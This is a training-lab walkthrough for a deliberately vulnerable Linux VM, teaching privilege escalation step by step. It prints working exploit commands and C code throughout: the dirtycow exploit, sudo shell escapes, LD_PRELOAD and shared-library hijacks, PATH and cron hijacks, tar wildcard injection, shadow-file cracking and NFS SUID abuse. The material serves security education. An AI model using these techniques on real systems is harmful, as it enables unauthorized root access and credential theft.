Linux PrivEsc Arena

Students will learn how to escalate privileges using a very vulnerable Linux VM. SSH is open. Your credentials are TCM:Hacker123

medium

75 min


You can either use the browser-based terminal (which appears when you deploy the machine), or you can connect to TryHackMe's network (via OpenVPN) and SSH in directly. If you've not done this before, first complete the OpenVPN room and learn how to connect.

Answer the questions below
Read the above.

This room will teach you a variety of privilege escalation tactics, including kernel exploits, sudo attacks, SUID attacks, scheduled task attacks, and more. This lab was built utilizing Sagi Shahar's privesc workshop (https://github.com/sagishahar/lpeworkshop) and utilized as part of The Cyber Mentor's Linux Privilege Escalation Udemy course (https://udemy.com/course/linux-privilege-escalation-for-beginners).

All tools needed to complete this course are in the user folder (/home/user/tools).

Let's first connect to the machine. SSH is open on port 22. Your credentials are:

username: TCM
password: Hacker123

Answer the questions below
Deploy the machine and log into the user account via SSH (or use the browser-based terminal).

Detection


1. In command prompt type:
/home/user/tools/linux-exploit-suggester/linux-exploit-suggester.sh
2. From the output, notice that the kernel is vulnerable to "dirtycow" (CVE-2016-5195, a race condition in the kernel's copy-on-write handling that lets an unprivileged user write to files they can only read).

Exploitation


1. In command prompt type:
gcc -pthread /home/user/tools/dirtycow/c0w.c -o c0w
2. In command prompt type: ./c0w

Disclaimer: This part takes 1-2 minutes - Please allow it some time to work. The exploit races two threads against the kernel, so it can also fail or hang; if it has not finished after a few minutes, kill it and run it again.

3. In command prompt type: passwd
4. In command prompt type: id

c0w overwrites the SUID binary /usr/bin/passwd with shellcode that spawns a root shell, which is why running passwd drops you to root. From here, either copy /tmp/passwd back to /usr/bin/passwd or reset your machine to undo changes made to the passwd binary; until you do, nobody on the box can change a password.
Answer the questions below
Click 'Completed' once you have successfully elevated the machine

Exploitation


1. In command prompt type: cat /home/user/myvpn.ovpn
2. From the output, make note of the value of the “auth-user-pass” directive.
3. In command prompt type: cat /etc/openvpn/auth.txt
4. From the output, make note of the clear-text credentials.
5. In command prompt type: cat /home/user/.irssi/config | grep -i passw
6. From the output, make note of the clear-text credentials.
Answer the questions below
What password did you find?

What user's credentials were exposed in the OpenVPN auth file?

Exploitation

1. In command prompt type: cat ~/.bash_history | grep -i passw
2. From the output, make note of the clear-text credentials.
Answer the questions below
What was TCM trying to log into?

Who was TCM trying to log in as?

Naughty naughty.  What was the password discovered?

Detection


1. In command prompt type:
ls -la /etc/shadow
2. Note the file permissions. /etc/shadow holds the password hashes and should be readable only by root (and the shadow group); here it is readable by everyone.

Exploitation


1. In command prompt type: cat /etc/passwd
2. Save the output to a file on your attacker machine
3. In command prompt type: cat /etc/shadow
4. Save the output to a file on your attacker machine

Attacker

1. In command prompt type: unshadow <PASSWORD-FILE> <SHADOW-FILE> > unshadowed.txt

Now, you have an unshadowed file: unshadow joins the two files on the username and puts each shadow hash into the password field of the matching passwd line. We already know the password, but you can use your favorite hash cracking tool to crack dem hashes. For example:

hashcat -m 1800 unshadowed.txt rockyou.txt -O

Mode 1800 is sha512crypt, the $6$ hashes found here; check the prefix of the hash field and pick the matching mode if it differs.
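The join that unshadow performs, as an added example written for this page in awk (not the room's own tooling), so you can see exactly what goes into the cracker without John installed. Both input files are constructed samples and the hash strings are placeholders:

```shell
#!/bin/sh
# Added example (not part of the room): what `unshadow` does, written in awk
# so it runs without John installed. Both input files are constructed samples
# and the hash strings are placeholders, not the Arena's real hashes.
set -eu

WORK=$(mktemp -d)
cat > "$WORK/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
user:x:1000:1000:user,,,:/home/user:/bin/bash
EOF
cat > "$WORK/shadow" <<'EOF'
root:$6$saltsalt$FAKEHASHROOT:18000:0:99999:7:::
daemon:*:18000:0:99999:7:::
user:$6$saltsalt$FAKEHASHUSER:18000:0:99999:7:::
EOF

# unshadow_awk PASSWD SHADOW: join the two files on the username (field 1)
# and replace the "x" in passwd field 2 with the hash from shadow field 2.
# The result is the passwd-style line format that john and hashcat consume.
unshadow_awk() {
    awk -F: -v OFS=: '
        NR == FNR     { hash[$1] = $2; next }   # first file (shadow): remember hash per user
        ($1 in hash)  { $2 = hash[$1] }          # second file (passwd): swap field 2
                      { print }
    ' "$2" "$1"
}

# crackable_only: drop locked or passwordless accounts ("*" or "!" in the
# hash field); a cracker would only waste time on them. Hashes starting "$6$"
# are sha512crypt (hashcat mode 1800); "$1$" would be md5crypt (mode 500).
crackable_only() {
    awk -F: '$2 !~ /^[*!]/'
}

unshadow_awk "$WORK/passwd" "$WORK/shadow" | crackable_only
```

Feed the output of the pipeline to hashcat or john exactly as you would unshadowed.txt; the daemon account is dropped because its hash field is "*", which no wordlist will ever match.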
Answer the questions below
What were the file permissions on the /etc/shadow file?

Detection


1. In command prompt type:
find / -name authorized_keys 2> /dev/null
2. In a command prompt type:
find / -name id_rsa 2> /dev/null
3. Note the results. A readable private key belonging to another account is as good as that account's password. Keys are often stored under other names too (id_dsa, id_ecdsa, id_ed25519), so widen the -name pattern if nothing turns up.

Exploitation


1. Copy the contents of the discovered id_rsa file to a file on your attacker machine.

Attacker

1. In command prompt type: chmod 400 id_rsa
2. In command prompt type: ssh -i id_rsa root@<ip>

You should now have a root shell :)
Answer the questions below
What's the full file path of the sensitive file you discovered?

Detection


1. In command prompt type: sudo -l
2. From the output, notice the list of programs that can run via sudo.

Exploitation


1. In command prompt type any of the following (each of these programs can spawn a shell from inside itself, so running them under sudo gives a root shell):
a. sudo find /bin -name nano -exec /bin/sh \;
b. sudo awk 'BEGIN {system("/bin/sh")}'
c. echo "os.execute('/bin/sh')" > shell.nse && sudo nmap --script=shell.nse
d. sudo vim -c '!sh'
Answer the questions below
Click 'Completed' once you have successfully elevated the machine

Detection


1. In command prompt type: sudo -l
2. From the output, notice the list of programs that can run via sudo.

Exploitation


1. In command prompt type:
sudo apache2 -f /etc/shadow
2. From the output, copy the root hash. apache2 -f treats the file as its configuration; the first line (root's shadow entry) is not a valid directive, and apache echoes it back in the syntax error, leaking the hash.

Attacker

1. Open command prompt and type:
echo '[Pasted Root Hash]' > hash.txt
2. In command prompt type:
john --wordlist=/usr/share/wordlists/nmap.lst hash.txt
3. From the output, notice the cracked credentials.
Answer the questions below
Click 'Completed' once you have successfully elevated the machine

Detection


1. In command prompt type: sudo -l
2. From the output, notice that env_keep includes LD_PRELOAD, i.e. sudo passes that variable through to the command it runs. The dynamic loader ignores LD_PRELOAD for set-uid binaries, but the programs listed here are ordinary binaries started as root by sudo, so whatever library LD_PRELOAD names gets loaded as root.

Exploitation

1. Open a text editor and type:

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>   /* setgid(), setuid() */

/* Runs when the library is loaded (linked with -nostartfiles, so _init is ours).
   Drop LD_PRELOAD first so the spawned bash does not load this library again. */
void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}

2. Save the file as x.c
3. In command prompt type:
gcc -fPIC -shared -o /tmp/x.so x.c -nostartfiles
4. In command prompt type:
sudo LD_PRELOAD=/tmp/x.so apache2
5. In command prompt type: id
Answer the questions below
Click 'Completed' once you have successfully elevated the machine

Detection


1. In command prompt type: find / -type f -perm -04000 -ls 2>/dev/null
2. From the output, make note of all the SUID binaries.
3. In command line type:
strace /usr/local/bin/suid-so 2>&1 | grep -i -E "open|access|no such file"
4. From the output, notice that the binary tries to load /home/user/.config/libcalc.so, which does not exist, from a directory under your home that you can create. A SUID binary loading a library from a path you control means your code runs with its privileges.
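The same check automated, as an added example written for this page (not part of the room or the workshop): it takes strace output, keeps the shared objects the loader failed to find, and filters them to the ones we could actually create. The trace lines are constructed, and the mktemp directory stands in for /home/user:

```shell
#!/bin/sh
# Added example (not from the room): pick out, from strace output, shared
# objects the loader looked for and did not find, keeping only the ones we
# could create ourselves. The trace lines below are constructed; $WORK stands
# in for the writable home directory (/home/user in the Arena).
set -eu

WORK=$(mktemp -d)
TRACE="$WORK/strace.log"
cat > "$TRACE" <<EOF
open("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
open("/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
open("$WORK/.config/libcalc.so", O_RDONLY) = -1 ENOENT (No such file or directory)
open("/usr/lib/libcalc.so", O_RDONLY) = -1 ENOENT (No such file or directory)
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
EOF

# missing_so_in_writable_dir TRACEFILE
# Prints every library path that open/openat/access reported as ENOENT where
# the directory either exists and is writable by us, or does not exist yet but
# its nearest existing ancestor is (so mkdir -p would succeed). Those are the
# candidates for a libcalc.so-style hijack. /usr/lib/libcalc.so above only
# survives the filter when this runs as root; ld.so.preload is not a library
# name and is never matched.
missing_so_in_writable_dir() {
    grep -E '^(open|openat|access)\(.*\.so(\.[0-9]+)*", .*ENOENT' "$1" |
    sed -E 's/^[a-z]+\((AT_FDCWD, )?"([^"]+)".*/\2/' |
    while IFS= read -r path; do
        dir=$(dirname "$path")
        while [ ! -e "$dir" ]; do dir=$(dirname "$dir"); done
        if [ -w "$dir" ]; then printf '%s\n' "$path"; fi
    done
}

missing_so_in_writable_dir "$TRACE"
```

Run it against a real trace with `strace -f -e trace=open,openat,access /usr/local/bin/suid-so 2>trace.log` on the target (the Arena's old glibc uses open; newer ones use openat, which the pattern also accepts); every path it prints is a place where dropping a constructor library gives you the binary's privileges.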

Exploitation


5. In command prompt type: mkdir /home/user/.config
6. In command prompt type: cd /home/user/.config
7. Open a text editor and type:

#include <stdio.h>
#include <stdlib.h>

static void inject() __attribute__((constructor));

void inject() {
    system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
}

8. Save the file as libcalc.c
9. In command prompt type:
gcc -shared -o /home/user/.config/libcalc.so -fPIC /home/user/.config/libcalc.c
10. In command prompt type: /usr/local/bin/suid-so
11. In command prompt type: id
Answer the questions below
Click 'Completed' once you have successfully elevated the machine

Detection


1. In command prompt type: dpkg -l | grep nginx
2. From the output, notice that the installed nginx version is below 1.6.2-5+deb8u3.

Exploitation

– Terminal 1

1. For this exploit, it is required that the user be www-data. To simulate this escalate to root by typing: su root
2. The root password is password123
3. Once escalated to root, in command prompt type: su -l www-data
4. In command prompt type: /home/user/tools/nginx/nginxed-root.sh /var/log/nginx/error.log
5. At this stage, the exploit waits for logrotate to rotate the nginx error log (normally a daily cron job). To speed up the process, the rotation will be triggered by hand from a second SSH session on the machine.

– Terminal 2

1. Once logged in, type: su root
2. The root password is password123
3. As root, type the following: invoke-rc.d nginx rotate >/dev/null 2>&1
4. Switch back to the previous terminal.

– Terminal 1

1. From the output, notice that the exploit continued its execution.
2. In command prompt type: id
Answer the questions below
What CVE is being exploited in this task?

What binary is SUID enabled and assists in the attack?

Detection


1. In command prompt type: find / -type f -perm -04000 -ls 2>/dev/null
2. From the output, make note of all the SUID binaries.
3. In command prompt type: strings /usr/local/bin/suid-env
4. From the output, notice the functions used by the binary and, in particular, that it runs "service" by bare name rather than by absolute path. The SUID binary calls system(), which spawns a shell, and that shell resolves the command through PATH, which you control.

Exploitation


1. In command prompt type:
printf '%s\n' '#include <stdlib.h>' '#include <unistd.h>' 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/service.c
2. In command prompt type: gcc /tmp/service.c -o /tmp/service
3. In command prompt type: export PATH=/tmp:$PATH
4. In command prompt type: /usr/local/bin/suid-env
5. In command prompt type: id
Answer the questions below
What is the last line of the "strings /usr/local/bin/suid-env" output?

Detection


1. In command prompt type: find / -type f -perm -04000 -ls 2>/dev/null
2. From the output, make note of all the SUID binaries.
3. In command prompt type: strings /usr/local/bin/suid-env2
4. From the output, notice the functions used by the binary. This time it calls /usr/sbin/service by its absolute path, so the PATH trick from the previous task does not apply; the two methods below abuse behaviour of the bash that system() spawns instead.

Exploitation Method #1


1. In command prompt type:
function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
2. In command prompt type:
export -f /usr/sbin/service
3. In command prompt type: /usr/local/bin/suid-env2

This works because the shell the binary spawns imports exported functions from its environment, and a function whose name is the absolute path shadows the real executable. Bash versions 4.2-048 and later refuse to import function names that look like paths, so it only works on older bash.

Exploitation Method #2


1. In command prompt type:
env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chown root.root /tmp/bash && chmod +s /tmp/bash)' /bin/sh -c '/usr/local/bin/suid-env2; set +x; /tmp/bash -p'

Here SHELLOPTS=xtrace switches the child bash into trace mode and PS4 is the trace prompt, which bash expands (including the $(...) command substitution) as root before each traced command. Bash 4.4 and later drop SHELLOPTS and PS4 from the environment when running with elevated privileges, so this too needs an older bash.
Answer the questions below
What is the last line of the "strings /usr/local/bin/suid-env2" output?

Detection


1. In command prompt type: getcap -r / 2>/dev/null
2. From the output, notice that /usr/bin/python2.6 has the "cap_setuid" capability set (effective and permitted, +ep): the binary may call setuid() no matter who runs it, which is as good as SUID root.

Exploitation


1. In command prompt type:
/usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'
2. Enjoy root!
Answer the questions below
Click 'Completed' once you have successfully elevated the machine

Detection


1. In command prompt type: cat /etc/crontab
2. From the output, notice the value of the "PATH" variable: it starts with /home/user, a directory you own, and the job below it runs overwrite.sh by bare name. Cron resolves that name with the crontab's own PATH, so it searches /home/user first.
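To make the resolution order concrete, here is an added example written for this page (not the room's material) that builds a constructed crontab whose PATH starts with a directory we own and shows which file cron would execute for "overwrite.sh" before and after we plant our own script. The mktemp directories stand in for /home/user and /usr/local/bin:

```shell
#!/bin/sh
# Added example (not from the room): cron resolves a bare command name with
# the PATH set inside the crontab, not the user's PATH. A constructed crontab
# puts a directory we own first; $WORK/home stands in for /home/user and
# $WORK/bin for /usr/local/bin, where the real job script lives.
set -eu

WORK=$(mktemp -d)
mkdir -p "$WORK/home" "$WORK/bin"
printf '#!/bin/sh\necho real job\n' > "$WORK/bin/overwrite.sh"
chmod 755 "$WORK/bin/overwrite.sh"
CRONTAB="$WORK/crontab"
cat > "$CRONTAB" <<EOF
SHELL=/bin/sh
PATH=$WORK/home:$WORK/bin:/usr/bin:/bin
* * * * * root overwrite.sh
EOF

# cron_path CRONTAB: the PATH line cron exports to its jobs
cron_path() {
    sed -n 's/^PATH=//p' "$1" | head -n 1
}

# writable_cron_path_dirs CRONTAB: PATH entries we can write to, in search
# order. Any of them listed before the real command's directory is a hijack point.
writable_cron_path_dirs() {
    cron_path "$1" | tr ':' '\n' | while IFS= read -r d; do
        if [ -n "$d" ] && [ -d "$d" ] && [ -w "$d" ]; then printf '%s\n' "$d"; fi
    done
}

# cron_resolves CRONTAB NAME: the file cron would execute for bare NAME
# (a subshell with the crontab's PATH, then the shell's own lookup)
cron_resolves() {
    ( PATH="$(cron_path "$1")"; export PATH; command -v "$2" )
}

# plant_job CRONTAB NAME: drop our own NAME into the first writable PATH dir
plant_job() {
    dir=$(writable_cron_path_dirs "$1" | head -n 1)
    printf '#!/bin/sh\necho planted job\n' > "$dir/$2"
    chmod 755 "$dir/$2"
    printf '%s\n' "$dir/$2"
}

echo "before: $(cron_resolves "$CRONTAB" overwrite.sh)"
plant_job "$CRONTAB" overwrite.sh >/dev/null
echo "after:  $(cron_resolves "$CRONTAB" overwrite.sh)"
```

The fix on the defending side is the mirror image: keep a PATH in /etc/crontab that contains only root-owned directories, and reference job scripts by absolute path so PATH is never consulted.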

Exploitation


1. In command prompt type:
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh
2. In command prompt type: chmod +x /home/user/overwrite.sh
3. Wait 1 minute for the Bash script to execute.
4. In command prompt type: /tmp/bash -p
5. In command prompt type: id
Answer the questions below
Click 'Completed' once you have successfully elevated the machine

Detection


1. In command prompt type: cat /etc/crontab
2. From the output, notice the script "/usr/local/bin/compress.sh"
3. In command prompt type: cat /usr/local/bin/compress.sh
4. From the output, notice the wildcard (*) used by 'tar'. The shell expands it into the file names in the directory, and GNU tar accepts options anywhere on its command line, so a file whose name starts with "--" is parsed as an option.

Exploitation


1. In command prompt type:
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/runme.sh
2. touch /home/user/--checkpoint=1
3. touch /home/user/--checkpoint-action=exec=sh\ runme.sh
4. Wait 1 minute for the Bash script to execute.
5. In command prompt type: /tmp/bash -p
6. In command prompt type: id
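The trick reproduced in a scratch directory, as an added example written for this page (not the room's code): the payload writes a marker file instead of copying a SUID bash, "tar cf ... *" mimics compress.sh's unquoted wildcard, and a second run with "--" shows the invocation that is not fooled. Requires GNU tar, since --checkpoint is a GNU extension:

```shell
#!/bin/sh
# Added example (not from the room): reproduce the tar wildcard trick in a
# scratch directory and contrast it with the fixed invocation. Everything here
# is constructed; the payload writes a marker file instead of planting a SUID
# bash, and "tar cf ... *" mimics compress.sh's unquoted wildcard.
# Needs GNU tar (the --checkpoint options are GNU extensions).
set -eu

WORK=$(mktemp -d)      # stands in for /home/user, where the cron job runs tar
OUT=$(mktemp -d)       # where the archive lands, outside the globbed directory
MARKER="$WORK/marker"

cd "$WORK"
printf 'echo pwned-by-tar > %s\n' "$MARKER" > runme.sh   # payload tar will run
echo data > normal.txt
touch -- --checkpoint=1                                  # file names tar reads as options
touch -- "--checkpoint-action=exec=sh runme.sh"

# vulnerable_backup: the cron job's pattern. The shell turns * into file
# names, tar permutes its arguments, and the two "--checkpoint" names become
# options: every checkpoint runs "sh runme.sh" with tar's privileges.
vulnerable_backup() {
    (cd "$WORK" && tar cf "$OUT/vuln.tar" *)
}

# fixed_backup: "--" ends option parsing (using ./* instead also works, since
# every name then starts with "./"), so the odd file names are just archived.
fixed_backup() {
    (cd "$WORK" && tar cf "$OUT/fixed.tar" -- *)
}

# payload_fired: did the checkpoint action execute?
payload_fired() {
    [ -f "$MARKER" ]
}

# run_and_check CMD: run CMD from a clean state; succeeds if the payload fired
run_and_check() {
    rm -f "$MARKER"
    "$@"
    payload_fired
}

if run_and_check vulnerable_backup; then echo "unquoted *: payload ran ($(cat "$MARKER"))"; fi
if run_and_check fixed_backup; then echo "unexpected: payload ran"; else echo "with --: payload did not run"; fi
```

Note that the file names themselves are harmless; the damage is done by whichever process expands the glob and runs tar, which in the room is root's cron job.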
Answer the questions below
Click 'Completed' once you have successfully elevated the machine

Detection


1. In command prompt type: cat /etc/crontab
2. From the output, notice the script “overwrite.sh”
3. In command prompt type: ls -l /usr/local/bin/overwrite.sh
4. From the output, notice the file permissions: the script is world-writable although cron runs it as root, so anything you append runs as root within the minute.

Exploitation


1. In command prompt type:
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /usr/local/bin/overwrite.sh
2. Wait 1 minute for the Bash script to execute.
3. In command prompt type: /tmp/bash -p
4. In command prompt type: id
Answer the questions below
Click 'Completed' once you have successfully elevated the machine

Detection


1. In command line type: cat /etc/exports
2. From the output, notice that “no_root_squash” option is defined for the “/tmp” export.

Exploitation

Attacker

1. Open command prompt and type: showmount -e MACHINE_IP
2. In command prompt type: mkdir /tmp/1
3. In command prompt type: mount -o rw,vers=2 MACHINE_IP:/tmp /tmp/1
4. In command prompt type:
printf '%s\n' '#include <stdlib.h>' '#include <unistd.h>' 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/1/x.c
5. In command prompt type: gcc /tmp/1/x.c -o /tmp/1/x
6. In command prompt type: chmod +s /tmp/1/x

Run these as root on the attacker: with no_root_squash the server does not map your UID 0 to nobody, so the file is owned by root on the target and its SUID bit is honoured there. If the mount fails, the server may not serve NFSv2; try vers=3.
Target

1. In command prompt type: /tmp/x
2. In command prompt type: id
Answer the questions below
Click 'Completed' once you have successfully elevated the machine
